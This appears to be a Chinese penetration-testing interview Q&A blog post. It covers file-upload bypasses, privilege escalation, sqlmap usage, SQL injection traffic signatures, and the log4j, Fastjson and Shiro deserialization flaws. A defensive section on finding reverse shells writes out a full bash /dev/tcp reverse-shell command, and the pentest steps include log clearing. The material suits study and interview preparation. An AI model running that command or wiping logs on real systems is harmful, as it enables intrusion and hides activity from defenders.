面试题(补充)

1、怎么加快盲注速度?

二分法和DNSlog外带测试

2、你说一下文件上传的绕过方式

*禁用前端js验证

*更改mime类型

*%00、0x00截断

*.htaccess、.user.ini.绕过

*文件扩展名绕过

*图片马绕过

3、反弹shel

反弹shell就是靶机将shell反弹给攻击者,从而达到让攻击者可以在靶机上执行shell命令,从而控制靶机

4、对护网红蓝对抗的理解

护网的红蓝对抗一般分为3个队伍:蓝队、红队和紫队,蓝队是防守方、红队是攻击方、紫队相当于裁判队

蓝队:不对用户造成太多限制的情况下,发现可被利用的漏洞,保护自己的领域

红队:用各种手段进行攻击

5、渗透测试流程

信息收集:

1、获取域名whois信息

2、服务器子域名、旁站、c段查询

3、服务器操作系统版本补丁状况、web中间件类型、版本、数据库类型等

4、服务器开放端口:22 ssh 80 web 445 3389.。

漏洞扫描:

nessus,awvs ,appscan

漏洞验证:

是否存在漏洞,是否可以拿到webshell或者其他权限

权限提升:

windows内核溢出提权,数据库提权、组策略首选项提取、web中间件提权、dll劫持提权、第三方软件/服务提权

linux内核漏洞提权、sudoer配置文件错误提权、SUID、SUDO

横向渗透

日志清理

6、内网渗透

*内网信息收集

*漏洞探测

*漏洞利用

*权限提升

*权限维持

7、windows、linux提权

windows提权:内核溢出提权,数据库提权、web中间件提权、系统错误配置漏洞提权

linux提权:内核漏洞提权、sudoer配置文件错误提权、SUDO、SUID提权

8、SQL注入的流量特征

1.参数长度异常:攻击者通常会在SQL注入攻击中使用长参数来尝试构建恶意语句,因此在网络流量中需要寻找异常长度的参数。

2.非法字符:攻击者通常使用非法字符来构建恶意SQL语句,如单引号、分号等。

3.异常请求:攻击者可能会在HTTP请求中包含多个语句或查询,或者在HTTP请求中包含错误或缺失的参数。

4.错误响应:如果应用程序未正确处理SQL注入攻击,则可能会返回错误响应。攻击者可以通过分析响应以查找此类错误,并尝试进一步攻击。

5.非常规流量:攻击者可能会在较短时间内发送大量请求,或在同一时间窗口内多次发送相同请求。这种非常规流量模式可能表明攻击正在进行中。

9、sqlmap如何post发起请求

*sqlmap -u xxxxx --data "user=1&password=2" --random-agent

*用burpsuite抓取post请求包,保存到txt文件中,sqlmap -r 123.txt

10、登陆注册框页面可以测试哪些漏洞

1、弱口令

2、sql注入

3、暴力破解

4、验证码绕过

5、目录扫描工具

6、js敏感信息泄露

11、排查反弹shell

明确反弹shell写法: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

1、登录服务器查看命令:ps -ef,过滤出反弹shell的进程

2、定位进程启动路径,命令:pwdx pid

3、进入启动路径,确认启动的服务是否正常,命令:cd *

4、定位可疑文件,并删除。命令:rm

5、停止进程shell进程,命令:kill -9 pid

14.常见的框架漏洞?

答;

log4j远程代码执行漏洞

原理: Log4j 是Apache 的一个开源项目,是一款基于Java 的开源日志记录工具。该漏洞主要是由于日志在打印时当遇到`{\`后,以:号作为分割,将表达式内容分割成两部分,前面一部分prefix,后面部分作为key,然后通过prefix去找对应的lookup,通过对应的lookup实例调用lookup方法,最后将key作为参数带入执行,引发远程代码执行漏洞。 具体操作: 在正常的log处理过程中对\*\*{**这两个紧邻的字符做了检测,一旦匹配到类似于表达式结构的字符串就会触发替换机制,将表达式的内容替换为表达式解析后的内容,而不是表达式本身,从而导致攻击者构造符合要求的表达式供系统执行

Fastjson反序列化漏洞

判断: 正常请求是get请求并且没有请求体,可以通过构造错误的POST请求,即可查看在返回包中是否有fastjson这个字符串来判断。 原理: fastjson是阿里巴巴开发的一款将json字符串和java对象进行序列化和反序列化的开源json解析库。fastjson提供了autotype功能,在请求过程中,我们可以在请求包中通过修改@type的值,来反序列化为指定的类型,而fastjson在反序列化过程中会设置和获取类中的属性,如果类中存在恶意方法,就会导致代码执行等这类问题。 无回显怎么办: 1.一种是直接将命令执行结果写入到静态资源文件里,如html、js等,然后通过http访问就可以直接看到结果 2.通过dnslog进行数据外带,但如果无法执行dns请求就无法验证了 3.直接将命令执行结果回显到请求Poc的HTTP响应中

Shiro反序列化漏洞

原理: Shiro是Apache下的一个开源Java安全框架,执行身份认证,授权,密码和会话管理。shiro在用户登录时除了账号密码外还提供了可传递选项remember me。用户在登录时如果勾选了remember me选项,那么在下一次登录时浏览器会携带cookie中的remember me字段发起请求,就不需要重新输入用户名和密码。 判断: 1.数据返回包中包含rememberMe=deleteMe字段。 2.直接发送原数据包,返回的数据中不存在关键字可以通过在发送数据包的cookie中增加字段:****rememberMe=然后查看返回数据包中是否存在关键字。 shiro-550: shiro反序列化漏洞利用有两个关键点,首先是在shiro<1.2.4时,AES加密的密钥Key被硬编码在代码里,只要能获取到这个key就可以构造恶意数据让shiro识别为正常数据。另外就是shiro在验证rememberMe时使用了readObject方法,readObject用来执行反序列化后需要执行的代码片段,从而造成恶意命令可以被执行。攻击者构造恶意代码,并且序列化,AES加密,base64编码后,作为cookie的rememberMe字段发送。Shiro将rememberMe进行编码,解密并且反序列化,最终造成反序列化漏洞。 shiro-721: 不需要key,利用Padding Oracle Attack构造出RememberMe字段后段的值结合合法的Remember。

13、常见中间件漏洞

(一) IIS

解析漏洞

(二) Apache

解析漏洞

目录遍历

(三) Nginx

文件解析

目录穿越

(四)Tomcat

1、任意文件上传

2、未授权弱口令+war后门文件部署

(五)jBoss

1、反序列化漏洞

2、war后门文件部署

(六)WebLogic

1、反序列化漏洞

3、任意文件上传

4、war后门文件部署

xss 有 cookie 一定可以无用户名密码登录吗?

基本可以。因为把 cookie 的值给浏览器,浏览器去访问页面会用已有的cookie 去访问,如果 cookie 有效,就会直接进去。

相关推荐
PcVue China2 小时前
PcVue + SQL Grid : 释放数据的无限潜力
大数据·服务器·数据库·sql·科技·安全·oracle
Hacker_Nightrain7 小时前
网络安全CTF比赛规则
网络·安全·web安全
看山还是山,看水还是。7 小时前
Redis 配置
运维·数据库·redis·安全·缓存·测试覆盖率
学编程的小程8 小时前
【安全通信】告别信息泄露:搭建你的开源视频聊天系统briefing
安全·开源·音视频
网络安全指导员8 小时前
恶意PDF文档分析记录
网络·安全·web安全·pdf
渗透测试老鸟-九青8 小时前
通过投毒Bingbot索引挖掘必应中的存储型XSS
服务器·前端·javascript·安全·web安全·缓存·xss
vortex59 小时前
蓝队基础之网络七层杀伤链:从识别到防御的全方位策略
安全·网络安全·蓝队
白总Server9 小时前
JVM解说
网络·jvm·物联网·安全·web安全·架构·数据库架构
kali-Myon9 小时前
ctfshow-web入门-SSTI(web361-web368)上
前端·python·学习·安全·web安全·web
xxtzaaa10 小时前
抖音如何更安全的运营多个账号 打好运营基础
安全